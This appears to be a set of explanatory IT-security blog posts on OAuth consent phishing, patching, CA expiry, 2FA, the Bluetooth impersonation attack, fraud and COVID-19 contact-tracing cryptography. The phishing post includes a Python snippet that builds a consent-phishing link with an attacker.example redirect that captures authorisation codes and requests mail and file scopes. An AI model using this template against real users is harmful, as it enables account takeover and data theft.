Phishing in the Clouds

Once again on phishing, this time with a new twist.

By now we all know and use complex SaaS Cloud services, like Microsoft’s Office 365, Google’s G Suite, Amazon’s services and so on. They are all very modular, meaning that there are multiple data storage services and multiple application services to choose from. Often a user must authorise a Cloud App to access her/his own data, and the App can also come from an external provider (a “partner” of the service). The authorisation is usually implemented with OAuth which, in a few words, is a secure access-delegation protocol based on the exchange of cryptographic tokens.

So what is the scam? Simple: you receive an email which looks like it comes from [name your Cloud provider here] and asks you to authorise an App (which looks authentic) to access your data. You do not need to enter any password, since you are already logged in to your Cloud service platform: you just click on the button, and that’s it!

You have given a fraudster access to all your Cloud data and services, and the fraudster can read your data and act on your behalf!
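To make this concrete, here is a minimal sketch of how such a consent link can be built. The endpoint and parameter names are those of a standard OAuth 2.0 authorisation request (here in the form used by the Microsoft identity platform), while the client_id, redirect URI and scopes are purely hypothetical:

```python
# A hypothetical consent-phishing link: the client_id and redirect_uri
# are invented; the endpoint and parameters are standard OAuth 2.0.
from urllib.parse import urlencode

params = {
    "client_id": "00000000-aaaa-bbbb-cccc-dddddddddddd",  # attacker's registered app
    "response_type": "code",
    "redirect_uri": "https://attacker.example/callback",  # attacker-controlled
    # Broad delegated permissions: read mail and files, keep a refresh token.
    "scope": "offline_access Mail.Read Files.Read.All",
    "state": "xyz",
}
print("https://login.microsoftonline.com/common/oauth2/v2.0/authorize?"
      + urlencode(params))
```

Note that the link points to the genuine login server of the provider: the only malicious elements are the App requesting consent and the redirect URI which receives the authorisation code. This is exactly why no password is requested and everything looks authentic.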

For more details read, for example, this article by Ars Technica.

More on Security Patching and Updates

These days I keep coming back to the “security patching and updates” issue, so I am going to add a couple more comments.

The first is about Ripple20 (here the official link, but the news is already widespread), which carries an impressive number of vulnerabilities with a CVSS v3 base score of 10.0. The question is again:

how can we secure all of these millions or billions of vulnerable devices, since it seems very likely that security patching is not an option for most of them?

The second one is very hypothetical, that is, in the “food for thought” class.

Assume, as some say, that in 2030 Quantum Computers will be powerful enough to break RSA and other asymmetric cryptographic algorithms, and that at the same time (or just before) Post Quantum Cryptography will deliver new secure algorithms to replace RSA and friends. At first sight all looks fine: we will just have to do a lot of security patching/updating of servers, clients, applications, CA certificates, credit cards (hardware), telephone SIMs (hardware), security keys (hardware), Hardware Security Modules (HSMs) and so on and on… But what about all those micro/embedded/IoT devices in which the current cryptographic algorithms are baked in? And all those large devices (like aircraft but also cars) which have been designed with cryptographic algorithms baked into them (no change possible)? We will probably have to choose between living dangerously and buying a new one. Or we could be forced to buy a new one, if the device stops working because its old algorithms are no longer accepted by the rest of the world.

PS. Concerning Quantum Computers, as far as I know nobody claims that a full Quantum Computer will be functioning by 2030: this is only the earliest estimated arrival, and it could take much, much longer, or it could even never happen!

PS. I deliberately do not want to consider the scenario in which full Quantum Computers are available and Post Quantum Cryptography is not.

Patching, Updating (again) and CA certificates

Well, it is not the first time I write a comment about the need to security patch and update all software, or about the problem of not doing so. This is even more problematic for IoT and embedded software.

I just read this article in The Register which describes a real problem that is starting to show itself. In a few words: for approximately 20 years we have been massively using CA certificates to establish encrypted (SSL/TLS) connections. Client software authenticates servers by trusting server certificates signed by a list of known Certification Authorities (CAs). Each client has installed, usually in libraries, the public root certificates of the CAs.

Now what happens if the root certificate of a CA expires?

This is not a problem for servers: their certificates are renewed periodically, and more recent server certificates are signed under the new CA root certificate.

Clients have some time, typically a few years, to acquire the new CA root certificates, because root certificates last many years, usually 20. But what if IoT or embedded devices never get an update? Think about cameras, smart TVs, refrigerators, light bulbs and any other kind of gadget which connects to an Internet service. When the old CA root certificate expires, they cannot connect to the server any more and they can just stop working. The only possible way out is to update the software manually, if a software update is available and if an update procedure is possible. Otherwise, the only option left is to buy a new device!
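To give an idea of the problem, here is a minimal sketch, assuming a recent version of the Python cryptography package plus certifi as a sample trust store, which scans a CA bundle and reports the root certificates close to expiry, i.e. the ones that would strand a device which never receives updates:

```python
# Scan a CA bundle and report root certificates expiring within a chosen
# horizon (a sketch: a real device would inspect its own trust store).
import datetime
import certifi
from cryptography import x509

with open(certifi.where(), "rb") as f:
    roots = x509.load_pem_x509_certificates(f.read())

horizon = datetime.datetime.utcnow() + datetime.timedelta(days=2 * 365)
for cert in roots:
    if cert.not_valid_after < horizon:
        print(cert.subject.rfc4514_string(), "expires on", cert.not_valid_after)
```

A device which cannot run a check like this, or cannot act on the result, will simply start failing its TLS handshakes one day, with no warning to the user.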

Security and Cryptography do not always go Hand in Hand with Availability

I have been reading this article by Ars Technica on smartphones’ 2FA Authenticator Apps and put it together with some thoughts about Hardware Security Keys (implementing the U2F [CTAP1] standard by the FIDO Alliance). In both scenarios, the security of the Second Factor of Authentication (2FA) is based on the confidentiality of a cryptographic secret key, held securely in the smartphone in the first case and in the USB hardware key in the second. In other words, the secret key cannot be read, copied or transferred to any other device, as is also the case for any smart card (or integrated circuit card, ICC) or any Hardware Security Module (HSM).

Good for Security, but what about Availability?

Consider this very simple (and secure) scenario: my smartphone with a 2FA Authenticator App (or alternatively my U2F USB key) utterly breaks down, and I have no way, at least within the usual economic and time constraints, to recover it.

Now what about access to all those services which I set up in a very secure way with 2FA?

There is no access, and no immediately available way to recover it! (But see below for more complete scenarios.)

The only possibility is to get new hardware and go through a usually manual and lengthy process to regain access to each account and to configure the new 2FA hardware.

So Availability is lost, and it could take quite some time and effort to regain it.

The Ars Technica article mentioned above describes how some 2FA Authenticator Apps provide a solution to this problem: the idea is to install the App on multiple devices and securely copy the secret key to each one of them. But now the secret key, even if itself encrypted, is no longer “hardware protected”, since it is possible to copy it and transfer it. So Security/Confidentiality goes down but Availability goes up.
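Most Authenticator Apps implement TOTP (RFC 6238), where the 2FA secret is in fact a symmetric key shared with the service. This minimal sketch shows why copying that secret to several devices restores Availability: any device holding the same secret computes the same one-time codes (the secret below is just an example value):

```python
# Minimal TOTP (RFC 6238 / RFC 4226): the one-time code depends only on
# the shared secret and the current time.
import base64, hmac, struct, time

def totp(secret_b32: str, period: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32)
    counter = int(time.time()) // period               # current time step
    digest = hmac.new(key, struct.pack(">Q", counter), "sha1").digest()
    offset = digest[-1] & 0x0F                         # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

SECRET = "JBSWY3DPEHPK3PXP"        # example secret shared by phone and backup
print(totp(SECRET), totp(SECRET))  # the two "devices" print identical codes
```

The flip side is equally visible: anything that can run this computation with a copy of the secret is a valid second factor, which is precisely the loss of hardware protection described above.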

Copying the secret in this way is obviously impossible with U2F hardware keys. In this case an alternative is to have multiple U2F hardware keys registered with all accounts and services, so that if one key breaks, one can always use a backup key to access the accounts and services. (For more info, see for example this support page by Google.)

On the Latest Bluetooth Impersonation Attack

Details of a new attack on Bluetooth have just been released (see here for its website). From what I understand, it is based on two weaknesses of the protocol itself.

A quick description seems to be the following (correct me if I have misunderstood something).

When two Bluetooth devices (Alice and Bob) pair, they establish a common secret key, mutually authenticating each other. The common secret key is kept by both Alice and Bob and used to authenticate each other in all future connections. Up to here all is fine.

Now it is important to notice the following points when Alice and Bob establish a new connection after pairing:

  • the connection can be established using a “Legacy Secure Connection” (LSC, less secure) or a “Secure Connection” (SC, secure), and either Alice or Bob can request to use LSC;
  • one of the devices acts as Master and the other as Slave; a connection can be closed and restarted, and either Alice or Bob can request to act as Master;
  • in a “Legacy Secure Connection” the Slave must prove to the Master that it has the common secret key, but the Master is not required to prove to the Slave that it also has the common secret key (Authentication weakness);
  • in a “Secure Connection” either Alice or Bob can close the connection and restart it as a “Legacy Secure Connection” (Downgrade weakness).

Now Charlie wants to intercept the Bluetooth connection between Alice and Bob: first he listens to their connection and learns their Bluetooth addresses (which are public). Then Charlie jams the connection between Alice and Bob, connects as a Master to Alice using LSC and Bob’s Bluetooth address, and connects as a Master to Bob using LSC and Alice’s Bluetooth address. Since Charlie is Master with respect to both Alice and Bob, and since he can always downgrade the connection to LSC, he does not have to prove to either Alice or Bob that he knows their common secret key. In this way Charlie is able to perform a MitM attack on the Bluetooth connection between Alice and Bob (obviously this description is very high level, I have just sketched an idea of what is going on; see also the toy model below).
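The following toy model (plain Python, not a real Bluetooth stack) is only meant to show how the two weaknesses combine; all names and the key-check logic are invented for illustration:

```python
# Toy model of the two weaknesses: any peer can request LSC (downgrade),
# and in LSC a "master" is never challenged (one-way authentication).
class Device:
    def __init__(self, name: str, link_key: str):
        self.name, self.link_key = name, link_key

    def accept(self, mode: str, peer_role: str, proof=None) -> bool:
        if mode == "LSC" and peer_role == "master":
            # Authentication weakness: only the slave side is challenged,
            # so the alleged master is accepted without proving the key.
            return True
        return proof == self.link_key  # otherwise the peer must prove the key

alice = Device("Alice", "key-shared-by-alice-and-bob")
bob = Device("Bob", "key-shared-by-alice-and-bob")

# Charlie spoofs Bob's address toward Alice and Alice's address toward Bob,
# requesting LSC and the master role both times: no key proof is ever needed.
print(alice.accept(mode="LSC", peer_role="master"))  # True -> Charlie accepted
print(bob.accept(mode="LSC", peer_role="master"))    # True -> full MitM
```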

The bad news is that this is a weakness of the protocol itself, so all existing Bluetooth implementations are subject to it. The good news is that the fix should not be too difficult, except for the fact that many (too many) devices cannot be patched! Fortunately this attack seems not to apply to Bluetooth LE, but I still expect that most Bluetooth devices subject to this attack will never be patched.

But we should also consider the real impact of this attack: to perform it, the attacker Charlie must be physically near enough to the two devices (Alice and Bob) and have dedicated hardware (even if not so expensive), which limits the practical scenarios. On the other hand, this attack can have important consequences if Bluetooth is used to transfer very sensitive information or for critical applications (for example in the health sector). In other words, I would not worry when using Bluetooth to listen to music from my smartphone, but I would worry if Bluetooth were used in some mission-critical application.

What’s happening in Cyber/IT Security?

Comparing currently reported cyber/IT security threats, attacks and incidents to what happened a few years ago, it seems to me that something has surely changed (I must warn that these conclusions are not based on statistics but on reading everyday bulletins and news).

On one side, security surely has improved: vulnerabilities are reported and fixed, patches are applied (at least more often), and security policies, standards and practices are making a difference. Still, managing passwords and properly configuring systems and services exposed on the Internet remain very difficult tasks, too often performed without the required depth.

But security has improved, which also means that attackers have been moving to easier and more lucrative approaches which have to do mostly with the “human interface”. In other words: fraud.

The first example is ransomware: the attacker is able to access the victim’s systems, copy vast amounts of data, then encrypt or remove it, and finally ask for a ransom not only to return the data but also to avoid making it public on the Internet. Since everybody is getting better at making backups, the important point here is the “making it public on the Internet” part, so that the ransom is demanded more to prevent sensitive data from being published than to restore the systems.

The second example is Targeted Phishing attacks, Business Email Compromise and similar scams, in which the attacker impersonates a well-known or important person, writing emails and letters, making phone calls etc., to convince typically a clerk, but in some cases also a manager, to send a large amount of money to the wrong bank account.

Neither of these two types of attacks is new, but now they are filling the news daily. Even if cyber/IT security can still improve tremendously, there have been and there are notable security improvements, which means that attacks are more and more often aimed at the weakest link: the human user.

Information, Science, Common Sense and Fake News

These days we drown in COVID-19 news, some reliable, some less, some … unclear.

One striking point is the difficulty of communicating scientific facts, whenever they are available, and how they get twisted, misinterpreted and even manipulated by almost everyone: from top leaders, politicians, journalists, communicators, “evangelists” and scientists, all the way down to (hopefully not too much) myself.

Having a scientific background, I have been struggling to make sense of the numbers we read in the news or on social media, hear on television or in Internet streams. A few times I tried to analyse them scientifically, always ending up with “not enough data” or “source and meaning of data unclear”. Numbers do not lie, but only if you know what they mean.

I then tried to make sense of the information submerging us by using “common sense” (whatever that means), and understood even less. Actually, I realised that “common sense” often leads us to give more credibility to Fake News than to authentic information.

This made me think back to the time when I was at university doing physics. It is well known that in the scientific research world there are at least two major kinds of communication issues:

  1. communicating with fellow researchers
  2. communicating with the public

and the second is a much bigger issue than the first.

Communication among fellow researchers has to be extremely clear and detailed: all data must be presented and clearly defined, otherwise misunderstandings and misinterpretations are the inevitable consequence. It is possible that many of the different “opinions” of the experts we hear every day are indeed based on this type of incomplete communication.

But these days it gets worse, since these “opinions” are rushed to the public, which understands something else entirely by using common sense rather than the appropriate scientific approach. Of this I have had personal experience, when friends asked me to explain some concepts of elementary particle physics: describing these concepts by means of analogies and loosely defined ideas often led my friends to conclusions which had nothing to do with physics, were wrong or were plainly absurd. Obviously it was not my friends’ fault but mine: all of us interpret the information we receive with the logical tools we have, even if none of them is really appropriate.

So where does this leave us concerning COVID-19? Scientific information should be presented clearly and precisely to the public, and in particular to our leaders and politicians, in a form in which the data can be logically understood by the recipient. This is difficult, but particularly important for information presented to the public by the news and by all information channels in times of crisis such as the one we are experiencing right now. Otherwise misunderstanding, misinterpretation and manipulation of information become too easy and too common. Unfortunately, recently this seems to have happened all too often.

Cryptography for a COVID-19 Contact Tracing App by Apple and Google

Apple and Google (in alphabetical order) have released a draft of a cryptographic protocol named Contact Tracing (here the specification) for a new privacy-preserving Bluetooth protocol to support COVID-19 contact tracing. As far as I understand (please correct me if I have misunderstood something), it should work as follows:

  • Bluetooth LE is extended on the devices with this new protocol
  • A service provider distributes an App which makes use of the protocol and communicates with a server managed by the service provider or a third party
  • Users install the App on their devices and keep Bluetooth on
  • When two devices with the App installed are nearby, they exchange some locally generated cryptographic key material called Rolling Proximity Identifiers: these identifiers are privacy-preserving, that is, from an identifier alone it is not possible to identify the device which originated it; all Rolling Proximity Identifiers are stored only locally on the devices themselves (both originator and receiver)
  • When a user tests positive for COVID-19, she or he enters this information in the App, which then generates a set of cryptographic key material called Diagnosis Keys corresponding to the days in which the user could already have been infected; the App then sends the Diagnosis Keys to the server, which distributes them to all other devices on which the App is running
  • When the App receives some Diagnosis Keys from the server, it is able to compute the corresponding set of Rolling Proximity Identifiers and to check whether at least one of them is present in its local storage; if there is a match, the derived information is that on a certain day, in a 10-minute time interval, the user of the App was in proximity of a person who later tested positive for COVID-19.

Obviously a Privacy prerequisite to all this is that neither the server nor the App manages or stores any other information or metadata about the users and the devices on which the App runs.
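As a rough sketch of the cryptography, as I read the draft: a per-device Tracing Key produces a Daily Tracing Key via HKDF, from which the Rolling Proximity Identifiers are derived with a truncated HMAC, and the Diagnosis Keys are simply the Daily Tracing Keys of the relevant days. The exact byte encodings below are my assumption, so check the specification for the precise details:

```python
# Sketch of the draft Contact Tracing key schedule (encodings assumed).
import hmac, os, time
from hashlib import sha256
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

tracing_key = os.urandom(32)  # generated once and never leaves the device

def daily_tracing_key(tk: bytes, day_number: int) -> bytes:
    # DTK_i = HKDF(tk, salt=None, info="CT-DTK" || D_i, 16 bytes)
    info = b"CT-DTK" + day_number.to_bytes(4, "little")
    return HKDF(algorithm=hashes.SHA256(), length=16, salt=None,
                info=info).derive(tk)

def rolling_proximity_identifier(dtk: bytes, interval: int) -> bytes:
    # RPI_{i,j} = Truncate(HMAC-SHA256(DTK_i, "CT-RPI" || TIN_j), 16)
    return hmac.new(dtk, b"CT-RPI" + bytes([interval]), sha256).digest()[:16]

now = int(time.time())
day, tin = now // 86400, (now % 86400) // 600  # day number, 10-minute slot
dtk = daily_tracing_key(tracing_key, day)
print(rolling_proximity_identifier(dtk, tin).hex())
```

A positive user uploads the Daily Tracing Keys of the infectious days as Diagnosis Keys; every other App re-derives the 144 identifiers of each such day and compares them with its local log, so the matching happens entirely on the device.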

Perception of IT Security in Times of Crisis

What happens to IT Security in times of crisis? The change of behaviour and the rush to provide new services can be detrimental to IT Security. We are witnessing this these days. From a broad perspective, there are at least two major sides to it: IT service providers and (new) users.

In a crisis like the COVID-19 one we are experiencing right now, IT service providers are asked to provide new services in an extremely short time and to improve the already existing ones. But in IT, rushing does not usually go well with security. Take as an example what has just happened in Italy: the government charged the state pension fund (INPS) with providing COVID-19 subsidies to no less than 5 million people (INPS usually pays pensions to more than 16 million people in Italy). Obviously, due to the full lock-down of the country, the procedure had to be done online. So the new IT services to request and manage the subsidies went online and, according to the news, an epic IT security failure followed: availability and, in part, integrity and confidentiality were violated.

Is it possible in IT to manage extremely tight and aggressive schedules and security at the same time? I believe so, but only if security is embedded in everything we do in IT.

But I believe that IT security, at least for IT as it is nowadays, also requires users to be aware of it and to behave accordingly. Due to COVID-19, we have all been required or strongly advised to move many activities to online services, from work to school, shopping etc. But the physical world has very different characteristics from the virtual Internet world.

For example, consider the case of a small local pro-bono association whose members used to meet in person periodically: access to the room is free, and there is freedom of speech and contribution to the association. Now think about moving these meetings to an audio/video conference on the Internet, publicly announced, with free entrance and free access for all participants to audio, video, chat etc.: is this the same thing?

Definitely not.

The rules and behaviours which apply to a physical meeting of a small group of people in a physical room, announced with paper leaflets distributed on the streets, surely do not apply to an audio/video/chat conference on the Internet. What can happen if you pretend they do? Instead of the usual 20 participants, hundreds or thousands of people could show up, and some could abuse the free access to audio/video/chat etc. for whatever purpose, including drugs, malware, pornography etc.

Is this a failure of the IT technology, of the service provider, or of the lack of security awareness of the (new) users?

How long will it take humanity to really comprehend the difference between the physical and the virtual world?